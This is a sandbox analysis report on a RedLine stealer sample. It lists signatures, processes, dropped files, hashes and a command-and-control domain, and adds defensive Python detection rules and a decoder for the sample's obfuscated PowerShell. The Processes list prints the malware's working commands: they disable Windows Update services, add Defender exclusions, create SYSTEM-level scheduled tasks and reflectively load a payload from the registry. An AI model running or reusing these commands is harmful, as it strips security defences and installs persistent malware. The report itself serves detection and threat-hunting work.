Analysis Overview
SHA256
34efda61716ff1db7297813317e194d4eaa74ae5209810ef6045aabab2af3179
Threat Level: Known bad
The file 1d678410484e34165adb652f7e86a2b5cae5f58d was found to be: Known bad.
Malicious Activity Summary
RedLine
Modifies security service
Suspicious use of NtCreateUserProcessOtherParentProcess
Suspicious use of NtCreateProcessExOtherParentProcess
RedLine payload
Blocklisted process makes network request
Stops running service(s)
Executes dropped EXE
Drops file in Drivers directory
Downloads MZ/PE file
Loads dropped DLL
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Drops file in Program Files directory
Program crash
Suspicious use of WriteProcessMemory
Checks processor information in registry
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-01-28 19:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-01-28 19:33
Reported
2023-01-28 19:36
Platform
win7-20220812-en
Max time kernel
71s
Max time network
46s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1920 created 1392 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1920 created 1392 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1920 created 1392 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1920 created 1392 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1264 created 420 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SysApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Stops running service(s)
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Uses the VBS compiler for execution
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1900 set thread context of 936 | N/A | C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 1920 set thread context of 1428 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\System32\dialer.exe |
| PID 1264 set thread context of 864 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 907cc3ec5733d901 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
Suspicious use of WriteProcessMemory
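The signatures above are the sandbox's verdicts; the command lines recorded in the Processes list that follows (the sc stop / reg delete chain against the Windows Update services, the Add-MpPreference -ExclusionPath call, the schtasks persistence as SYSTEM and every minute from AppData, and the reflective [Reflection.Assembly]::Load from the registry) are the concrete artifacts a detection engineer would write rules against. The Python below is an added example, not part of the sandbox report or of the RedLine sample: it runs a small set of command-line rules over constructed process-creation events whose command lines are copied from this report plus one benign control. The event field names, rule names and the ATT&CK mapping are the example's own.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (Sysmon Event ID 1 style). The command
# lines are copied from the Processes list of this report; the last event is a
# benign control. Field names are this example's own, not the sandbox's schema.
EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"},
    {"image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'''"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"'''},
    {"image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE",
     "cmdline": r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"""},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\Windows\Temp | Sort-Object Length"},  # benign control
]


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str   # ATT&CK technique this example maps the behaviour to
    patterns: tuple  # every pattern must match (logical AND)
    min_hits: int = 1  # minimum matches per pattern (used for the obfuscation counter)


RULES = (
    Rule("update_services_stopped", "T1489 Service Stop",
         (re.compile(r"\bsc(\.exe)?\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I),)),
    Rule("service_registry_key_deleted", "T1562.001 Disable or Modify Tools",
         (re.compile(r'\breg(\.exe)?\s+delete\s+"?HKLM\\SYSTEM\\CurrentControlSet\\Services\\', re.I),)),
    Rule("defender_exclusion_added", "T1562.001 Disable or Modify Tools",
         (re.compile(r"Add-MpPreference", re.I), re.compile(r"-ExclusionPath\b", re.I))),
    Rule("schtask_runs_as_system", "T1053.005 Scheduled Task",
         (re.compile(r"schtasks", re.I), re.compile(r"/create\b", re.I), re.compile(r"/ru\s+'?System\b", re.I))),
    Rule("schtask_every_minute_from_appdata", "T1053.005 Scheduled Task",
         (re.compile(r"schtasks", re.I), re.compile(r"/sc\s+minute\b", re.I),
          re.compile(r'/tr\s+"?[^"]*\\AppData\\', re.I))),
    Rule("reflective_load_from_registry", "T1620 Reflective Code Loading",
         (re.compile(r"\[Reflection\.Assembly\]::Load\(", re.I), re.compile(r"Registry\]::", re.I))),
    # Three or more [Char](N) casts in one command line is a cheap obfuscation heuristic.
    Rule("char_obfuscated_powershell", "T1027 Obfuscated Files or Information",
         (re.compile(r"\[Char\]\(\d+\)", re.I),), min_hits=3),
)


def evaluate(event: dict) -> list:
    """Return the names of every rule that fires on one process-creation event."""
    # The second schtasks event carries no image name in its command line, so
    # match against image and command line together.
    text = f"{event['image']} {event['cmdline']}"
    return [rule.name for rule in RULES
            if all(len(p.findall(text)) >= rule.min_hits for p in rule.patterns)]


def triage(events: list) -> dict:
    """Map event index -> fired rule names, for events that fired at least one rule."""
    report = {}
    for index, event in enumerate(events):
        names = evaluate(event)
        if names:
            report[index] = names
    return report


def techniques_for(names: list) -> list:
    """Sorted ATT&CK technique IDs (this example's own mapping) for fired rule names."""
    by_name = {rule.name: rule.technique for rule in RULES}
    return sorted({by_name[n].split()[0] for n in names})


if __name__ == "__main__":
    for index, names in triage(EVENTS).items():
        print(f"event {index}: {names} -> {techniques_for(names)}")
```

These rules only see what process-creation telemetry exposes. The hosts-file write, the SetThreadContext injection into vbc.exe, dialer.exe and dllhost.exe, and the parent-PID spoofing onto Explorer.EXE and winlogon.exe in the tables above need file, thread and process-access events (Sysmon 8/10/11 or an EDR) and are not covered here.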
Processes
| Image | Command line |
| C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe |
| C:\Windows\system32\services.exe | C:\Windows\system32\services.exe |
| C:\Windows\system32\winlogon.exe | winlogon.exe |
| C:\Windows\system32\lsm.exe | C:\Windows\system32\lsm.exe |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork |
| C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE |
| C:\Windows\system32\sppsvc.exe | C:\Windows\system32\sppsvc.exe |
| \\?\C:\Windows\system32\wbem\WMIADAP.EXE | wmiadap.exe /F /T /R |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation |
| C:\Windows\system32\Dwm.exe | "C:\Windows\system32\Dwm.exe" |
| C:\Windows\system32\taskhost.exe | "taskhost.exe" |
| C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k RPCSS |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch |
| C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe | "C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 48 |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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" |
| C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe" |
| C:\Users\Admin\AppData\Local\Temp\new2.exe | "C:\Users\Admin\AppData\Local\Temp\new2.exe" |
| C:\Users\Admin\AppData\Local\Temp\SysApp.exe | "C:\Users\Admin\AppData\Local\Temp\SysApp.exe" |
| C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force |
| C:\Windows\System32\cmd.exe | C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' } |
| C:\Windows\System32\sc.exe | sc stop UsoSvc |
| C:\Windows\System32\sc.exe | sc stop WaaSMedicSvc |
| C:\Windows\System32\sc.exe | sc stop wuauserv |
| C:\Windows\System32\sc.exe | sc stop bits |
| C:\Windows\System32\sc.exe | sc stop dosvc |
| C:\Windows\System32\reg.exe | reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f |
| C:\Windows\system32\schtasks.exe | "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'" |
| C:\Windows\System32\reg.exe | reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f |
| C:\Windows\System32\reg.exe | reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f |
| C:\Windows\System32\reg.exe | reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f |
| C:\Windows\System32\reg.exe | reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f |
| C:\Windows\System32\dialer.exe | C:\Windows\System32\dialer.exe |
| C:\Windows\system32\taskeng.exe | taskeng.exe {D2F4B154-B34F-4D3B-A391-593E082648CF} S-1-5-18:NT AUTHORITY\System:Service: |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null) |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null) |
| C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "1959875407-12146705781331186516168542111652073145-519956228815563010-1410659623" |
| C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-187033790111701965561142526317-41152161-281305803148828164011928792981712477200" |
| C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{2dc4ea7c-c7b0-4e43-8ff2-64385d0e7144} |
| C:\Windows\SysWOW64\schtasks.exe | /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe" |
| C:\Windows\system32\taskeng.exe | taskeng.exe {FEBE4701-4209-46E0-B4FD-C8B231564A40} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1] |
| C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe |
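The two powershell.EXE command lines above (one launched from SysWOW64, one from System32) hide the registry location they read with PowerShell string concatenation and [Char](N) casts, then hand the bytes to [Reflection.Assembly]::Load and call the assembly's entry point. Decoding that by hand is error-prone. The Python below is an added example, not part of the report or of the sample: it evaluates exactly that concatenation grammar (single-quoted literals, [Char](N) casts and +, nothing else, so no PowerShell is ever executed) and pulls the OpenSubkey(...) and GetValue(...) arguments out of each command line. The two input strings are copied verbatim from the Processes list; the function names are the example's own.

```python
import re

# The two stager command lines recorded in the Processes list of this report
# (copied verbatim). Only the registry path is obfuscated; the reflective
# Load / EntryPoint.Invoke pattern is in the clear.
STAGER_WOW64 = r"""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"""
STAGER_X64 = r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"""

# One term of the concatenation: a single-quoted literal ('' inside a literal
# is an escaped quote) or a [Char](N) cast. Terms are joined by '+'.
_TERM = re.compile(r"\s*(?:'((?:[^']|'')*)'|\[Char\]\((\d+)\))\s*", re.I)


def eval_concat(expr: str) -> str:
    """Evaluate a PowerShell concatenation of string literals and [Char](N) casts."""
    out, pos = [], 0
    while pos < len(expr):
        m = _TERM.match(expr, pos)
        if m is None:
            raise ValueError(f"unsupported token at offset {pos}: {expr[pos:pos + 20]!r}")
        literal, code = m.groups()
        out.append(chr(int(code)) if code is not None else literal.replace("''", "'"))
        pos = m.end()
        if pos < len(expr):
            if expr[pos] != "+":
                raise ValueError(f"expected '+' at offset {pos}")
            pos += 1
    return "".join(out)


def _call_argument(text: str, method: str) -> str:
    """Raw argument text of the first .method(...) call, honouring nested parentheses
    (the [Char](N) casts) and single-quoted strings."""
    start = text.find(f".{method}(")
    if start < 0:
        raise ValueError(f"no .{method}( call found")
    first = start + len(method) + 2
    depth, in_quote = 1, False
    for j in range(first, len(text)):
        c = text[j]
        if c == "'":
            in_quote = not in_quote  # '' toggles twice, so escaped quotes are harmless
        elif not in_quote:
            if c == "(":
                depth += 1
            elif c == ")":
                depth -= 1
                if depth == 0:
                    return text[first:j]
    raise ValueError("unbalanced parentheses")


def decode_registry_loader(cmdline: str) -> dict:
    """Recover where a [Reflection.Assembly]::Load(<registry value>) stager reads its payload."""
    if "::LocalMachine" in cmdline:
        hive = "HKLM"
    elif "::CurrentUser" in cmdline:
        hive = "HKCU"
    else:
        hive = "?"
    return {
        "hive": hive,
        "subkey": eval_concat(_call_argument(cmdline, "OpenSubkey")),
        "value": eval_concat(_call_argument(cmdline, "GetValue")),
        "reflective_load": "[Reflection.Assembly]::Load(" in cmdline,
    }


def registry_path(cmdline: str) -> str:
    """The decoded location as a reg.exe-style path, e.g. HKLM\\SOFTWARE\\<value>."""
    d = decode_registry_loader(cmdline)
    return f"{d['hive']}\\{d['subkey']}\\{d['value']}"


if __name__ == "__main__":
    for label, cmd in (("SysWOW64 stager", STAGER_WOW64), ("System32 stager", STAGER_X64)):
        print(f"{label}: {registry_path(cmd)}")
```

Both command lines decode to the same location, the dialerstager value under HKLM\SOFTWARE, which is the hunting artifact to check on a suspect host (for example with reg query HKLM\SOFTWARE /v dialerstager). On 64-bit Windows the SysWOW64 copy of powershell.EXE sees HKLM\SOFTWARE through WOW64 registry redirection, so the 32-bit view of that key (HKLM\SOFTWARE\Wow6432Node) is worth checking as well.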
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | connect2me.hopto.org | udp |
| N/A | 37.139.129.113:443 | connect2me.hopto.org | tcp |
Files
memory/936-54-0x0000000000400000-0x0000000000405000-memory.dmp
memory/936-56-0x0000000000400000-0x0000000000405000-memory.dmp
memory/936-62-0x0000000000401159-mapping.dmp
memory/936-63-0x0000000075A81000-0x0000000075A83000-memory.dmp
memory/936-64-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1972-65-0x0000000000000000-mapping.dmp
memory/1444-66-0x0000000000000000-mapping.dmp
memory/1444-68-0x0000000073170000-0x000000007371B000-memory.dmp
\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
memory/888-71-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
memory/1612-75-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
memory/888-77-0x0000000001280000-0x00000000013EC000-memory.dmp
\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/1824-80-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/1920-83-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
